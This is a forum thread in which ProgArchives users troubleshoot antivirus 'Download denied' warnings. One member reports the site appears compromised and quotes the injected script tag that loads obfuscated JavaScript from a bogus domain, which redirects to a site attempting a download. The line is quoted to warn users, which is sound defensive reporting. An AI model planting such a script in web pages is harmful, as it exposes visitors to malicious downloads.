Download denied |
Post Reply | Page 12> |
Author | ||
Nogbad_The_Bad
Forum & Site Admin Group RIO/Avant/Zeuhl & Eclectic Team Joined: March 16 2007 Location: Boston Status: Offline Points: 20850 |
Post Options
Thanks(0)
Posted: October 06 2022 at 12:29 |
|
That's what I'm watching.
|
||
Ian
Host of the Post-Avant Jazzcore Happy Hour on Progrock.com https://podcasts.progrock.com/post-avant-jazzcore-happy-hour/ |
||
chopper
Special Collaborator Honorary Collaborator Joined: July 13 2005 Location: Essex, UK Status: Offline Points: 20030 |
Post Options
Thanks(0)
|
|
PA is well behind in its version of the forum software but I don't suppose it's going to get upgraded any time soon since M@x seems to have abandoned it. I'm thinking PA is dying a slow death now, at some point the forum software will stop working (it's probably out of support now).
|
||
wiz_d_kidd
Forum Senior Member Joined: January 13 2018 Location: EllicottCityMD Status: Offline Points: 1423 |
Post Options
Thanks(0)
|
|
Apparently PA uses Web Wiz Forums software, version 11.01 (released 10 Sep 2014). The latest version is 12.05 (released 18 Jan 2022). I did a search for Web Wiz vulnerabilities, and found that many versions, beginning with v6.34 and extending thru v10.03, were identified as having vulnerability to cross-site scripting (XSS) attacks. That's a lot of versions for which they never fixed the problem, and it still might be present in v11.01. https://www.cvedetails.com/cve/CVE-2006-0175/ https://www.exploit-db.com/exploits/28589 https://vulmon.com/searchpage?q=web+wiz+forum https://www.nmmapper.com/st/exploitdetails/37678/36689/web-wiz-forums-multiple-cross-site-scripting-vulnerabilitiesdownload/ Edited by wiz_d_kidd - October 06 2022 at 10:10 |
||
“I don’t like country music, but I don’t mean to denigrate those who do. And for those who like country music, denigrate means to ‘put down.'” – Bob Newhart
|
||
wiz_d_kidd
Forum Senior Member Joined: January 13 2018 Location: EllicottCityMD Status: Offline Points: 1423 |
Post Options
Thanks(0)
|
|
I'm not sure how this website works, but the root infection might actually be in the code that generates and updates the pages your browser receives. Removing the bad script from the output pages might not fix the problem, if it gets added again then next time the page refreshes. So far, this is the status of the pages I'm aware of: Main - not infected Forums - infected Prog Rock Guides - infected Log In - not infected Prog Radios - not infected Prog Links - not infected FAQ - infected About Us - not infected The bad script occurs multiple times on some of these pages, not just once.
|
||
“I don’t like country music, but I don’t mean to denigrate those who do. And for those who like country music, denigrate means to ‘put down.'” – Bob Newhart
|
||
chopper
Special Collaborator Honorary Collaborator Joined: July 13 2005 Location: Essex, UK Status: Offline Points: 20030 |
Post Options
Thanks(0)
|
|
Presumably this is a fairly simple code change to remove references to that script from the code? Can you tell which pages are impacted?
|
||
wiz_d_kidd
Forum Senior Member Joined: January 13 2018 Location: EllicottCityMD Status: Offline Points: 1423 |
Post Options
Thanks(0)
|
|
The website
https://new2sportnews.com, and the script (progarchives.js) are still there, but that script invokes another script (of unknown name) at https://advertising-cdn.com which is now offline. I agree with you that they can relaunch a future attack with ease now that they have the "hooks" built into PA. This all smacks of a Reflected Cross-Site Scripting (XSS) attack, which is explained here: https://portswigger.net/web-security/cross-site-scripting Edited by wiz_d_kidd - October 05 2022 at 10:18 |
||
“I don’t like country music, but I don’t mean to denigrate those who do. And for those who like country music, denigrate means to ‘put down.'” – Bob Newhart
|
||
chopper
Special Collaborator Honorary Collaborator Joined: July 13 2005 Location: Essex, UK Status: Offline Points: 20030 |
Post Options
Thanks(0)
|
|
Edge developer tools are throwing up an error on that web page. I'm not an expert on this, but that suggests to me that the script is not being executed however that would be the case if the web site is not longer there, but it does leave PA open to future attacks, I would guess.
|
||
chopper
Special Collaborator Honorary Collaborator Joined: July 13 2005 Location: Essex, UK Status: Offline Points: 20030 |
Post Options
Thanks(0)
|
|
Wow, that is worrying, thanks for doing this.
Do you know the name of the file that it attempts to download? My anti-virus is not picking anything up but, as you say, this could be a serious problem. It's a shame M@x no longer does anything with PA.
|
||
wiz_d_kidd
Forum Senior Member Joined: January 13 2018 Location: EllicottCityMD Status: Offline Points: 1423 |
Post Options
Thanks(0)
|
|
It seems that many users, myself included, have had similar issues. I've spent considerable time digging into the source of the problem. The upshot is that ProgArchives appears to have been hacked! Back in August, I began getting warnings from Norton Antivirus about a malicious activity (i.e. intrusion detections) when I visit the "Forums", or "Prog Rock Guides" pages. But it doesn't happen on the "About Us" page, or the main page. The problem is that the HTML code for the Forums and Guides pages (and probably others) contains malicious javascript that looks like this: <script src="https://new2sportnews.com/progarchives.js" type="d597b4f971c3864a4c6a613f-text/javascript"></script> The referenced site, new2sportnews.com, has the appearance of the Nigerian version of The Guardian website. However, it is a bogus web site. It was created in Jan 2021 and had no content until Jun 2022, and the content (according to the internet's Wayback Machine) has not changed since then. The javascript that is stored at that site (i.e. https://new2sportnews.com/progarchives.js) and is being executed unconditionally by Progarchives, is highly obfuscated to hide its function. I ran it through an "unobfuscator" and confirmed that the script redirects the user to a site called "advertising-cdn.com" which attempts to download a file to the user's computer. The nature of the file is unknown. It could be password stealing, keystroke interception, or other nefarious functions. I also checked Progarchives using the Wayback Machine and determined that it was clean as of July 19th. Sometime after that is when the system was hacked. Users, myself included, began experiencing problems around Aug 7th. After an update to my Norton Antivirus, it started completely blocking my access to the forums because I couldn't stop it from executing the malicious javascript. I could disable javascript entirely, but then I could not post or vote in polls. My solution was to install the NoScript add-on to Firefox, and disable scripts specifically for new2sportnews.com. That seems to have worked, as least for now. The target site, advertising-cdn.com, which contains the dowloader script appeared to be a valid site at first, but now it is gone. The hackers could be working on a different attack. I've contacted PA admins through every means possible. Thanks to Ian (aka Nogbad the Bad) for forwarding private messages that I sent him on Progressive ears. I also contacted the site owners/admins thru GoDaddy, but so far no one has responded. I hope that our site admins fix this infection before its users are seriously attacked. There is no valid reason that the HTML code for this site should be executing a javascript on a bogus website! To check for yourself, look at the page source HTML (in Firefox right-click anywhere on a page and select "View Page Source"), then search for new2sportnews.com. If you find it, you've confirmed that the site has been hacked and can potentially cause serious harm to its users (if it hasn't already). |
||
“I don’t like country music, but I don’t mean to denigrate those who do. And for those who like country music, denigrate means to ‘put down.'” – Bob Newhart
|
||
I prophesy disaster
Forum Senior Member Joined: December 31 2017 Location: Australia Status: Online Points: 4780 |
Post Options
Thanks(0)
|
|
I should remark that it was only yesterday's "Download denied" notifications that were caused by the VPN. The original problem that lasted more than a month was not caused by the VPN. I don't use the VPN to visit this site and it was quite by accident without realising that it was still on that it was in use while I was visiting this site yesterday.
|
||
No, I know how to behave in the restaurant now, I don't tear at the meat with my hands. If I've become a man of the world somehow, that's not necessarily to say I'm a worldly man.
|
||
I prophesy disaster
Forum Senior Member Joined: December 31 2017 Location: Australia Status: Online Points: 4780 |
Post Options
Thanks(0)
|
|
^ VPN server in London –> "Download denied" notification.
VPN server in Sydney –> "Download denied" notification. So, it appears that the problem is with the VPN. Edited by I prophesy disaster - September 23 2022 at 15:56 |
||
No, I know how to behave in the restaurant now, I don't tear at the meat with my hands. If I've become a man of the world somehow, that's not necessarily to say I'm a worldly man.
|
||
I prophesy disaster
Forum Senior Member Joined: December 31 2017 Location: Australia Status: Online Points: 4780 |
Post Options
Thanks(0)
|
|
I just discovered something quite interesting: I have a VPN which I sometimes use and sometimes don't use, depending on what I'm doing. When I'm not using the VPN, I don't get the "Download denied" notification. But when I do use the VPN (server in Los Angeles), I get the notifications. I haven't yet tried the VPN server in other available locations, so I don't know if the problem is with the VPN or the location.
|
||
No, I know how to behave in the restaurant now, I don't tear at the meat with my hands. If I've become a man of the world somehow, that's not necessarily to say I'm a worldly man.
|
||
I prophesy disaster
Forum Senior Member Joined: December 31 2017 Location: Australia Status: Online Points: 4780 |
Post Options
Thanks(0)
|
|
^And the "PROG ROCK GUIDES" and "FAQ" links.
|
||
No, I know how to behave in the restaurant now, I don't tear at the meat with my hands. If I've become a man of the world somehow, that's not necessarily to say I'm a worldly man.
|
||
I prophesy disaster
Forum Senior Member Joined: December 31 2017 Location: Australia Status: Online Points: 4780 |
Post Options
Thanks(0)
|
|
Actually, it does occur when I click on any of the "PROG SUB-GENRES" links. |
||
No, I know how to behave in the restaurant now, I don't tear at the meat with my hands. If I've become a man of the world somehow, that's not necessarily to say I'm a worldly man.
|
||
Cristi
Special Collaborator Crossover / Prog Metal Teams Joined: July 27 2006 Location: wonderland Status: Online Points: 43717 |
Post Options
Thanks(0)
|
|
I played with the antivirus settings, trial and error. I got it right in the end. I don't use Google chrome for PA anymore.
|
||
I prophesy disaster
Forum Senior Member Joined: December 31 2017 Location: Australia Status: Online Points: 4780 |
Post Options
Thanks(0)
|
|
^ This problem is only occurring on the forum pages, not on the database pages. But it does occur every time I click on any link in the forum.
How did you solve your problem (if it isn't too involved to say)? |
||
No, I know how to behave in the restaurant now, I don't tear at the meat with my hands. If I've become a man of the world somehow, that's not necessarily to say I'm a worldly man.
|
||
Cristi
Special Collaborator Crossover / Prog Metal Teams Joined: July 27 2006 Location: wonderland Status: Online Points: 43717 |
Post Options
Thanks(0)
|
|
I had some problems a few months ago, but it was my antivirus that didn't let me see any album pages because of "phishing". I solved the problem but it took me a little while.
|
||
I prophesy disaster
Forum Senior Member Joined: December 31 2017 Location: Australia Status: Online Points: 4780 |
Post Options
Thanks(0)
|
|
^ This is the only site where it happens. And there was another topic started by wiz_d_kidd reporting something similar: Intrusion Detected from PA. That topic referred to the same website, but I think the difference might be due to different security software. It is the security software that is producing the notifications.
|
||
No, I know how to behave in the restaurant now, I don't tear at the meat with my hands. If I've become a man of the world somehow, that's not necessarily to say I'm a worldly man.
|
||
Cristi
Special Collaborator Crossover / Prog Metal Teams Joined: July 27 2006 Location: wonderland Status: Online Points: 43717 |
Post Options
Thanks(0)
|
|
^ it does not seem to be PA fault for what's going on there. I think your browser is stuck on some weird ads, trackers and the likes.
|
||
I prophesy disaster
Forum Senior Member Joined: December 31 2017 Location: Australia Status: Online Points: 4780 |
Post Options
Thanks(0)
|
|
That's the notification I get. I have no idea to what "download" is referring. I assume it's something that the https://advertising-cdn.com website is trying to download onto my computer.
I have four browsers on my computer, but I mostly use only two of them: Edge and Chrome. I use Edge for sites that keep me logged on, such as this site, and Chrome for things I'd rather clear my browser history, cookies, etc. I have Firefox but I don't like it. |
||
No, I know how to behave in the restaurant now, I don't tear at the meat with my hands. If I've become a man of the world somehow, that's not necessarily to say I'm a worldly man.
|
||
Post Reply | Page 12> |
Forum Jump | Forum Permissions You cannot post new topics in this forum You cannot reply to topics in this forum You cannot delete your posts in this forum You cannot edit your posts in this forum You cannot create polls in this forum You cannot vote in polls in this forum |